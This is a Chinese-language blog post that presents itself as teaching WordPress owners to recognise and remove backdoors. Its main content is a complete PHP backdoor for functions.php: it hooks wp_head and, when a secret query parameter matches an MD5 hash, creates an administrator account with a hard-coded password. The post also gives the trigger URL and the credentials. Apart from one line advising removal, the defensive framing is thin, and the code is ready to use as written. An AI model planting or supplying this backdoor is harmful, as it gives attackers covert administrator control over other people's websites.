肯定有很多人网站或者服务器被黑过,但是刚接触网站时并不懂编程,所以无法自己排除后门,今天给大家带来的是如何在Wordpress程序里增加后门的教程!该教程并不是教会大家如何给程序留后门或者干坏事,而是教大家如何正确的清除后门,正确的认识后门!
代码:
<?php
add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'backdoor' ) ) {
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}
functions.php
文件中添加以上代码,就可以给 WordPress 添加一个能够创建管理员的后门,只需访问 http://
xxx.xxx.com/?backdoor=go,然后就创建了一个用户名为“backdoor”,密码为:“pa55w0rd!” 的管理员。
大家在代码中见到该类型的PHP语句特征记得自我清除一下,避免被他人勒索或被清站的风险!
小编说:
肯定会有很多网友说如果说出来了,大家肯定都会去给网站源码加后门。其实大家对后门的认识并不大,只有真正懂得如何给网站加后门了,才可以正确理解和自我清除后门,以及遇到后门时该如何解决。
© 版权声明
本站提供的资源转载自国内外各大资源站和网络,仅供学习体验;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容。如果您喜欢该资源内容,请支持正版,购买注册,得到更好的正版服务。我们非常重视版权问题,如有侵权请邮件与我们联系处理。敬请谅解!请点击《侵权处理》
THE END
暂无评论内容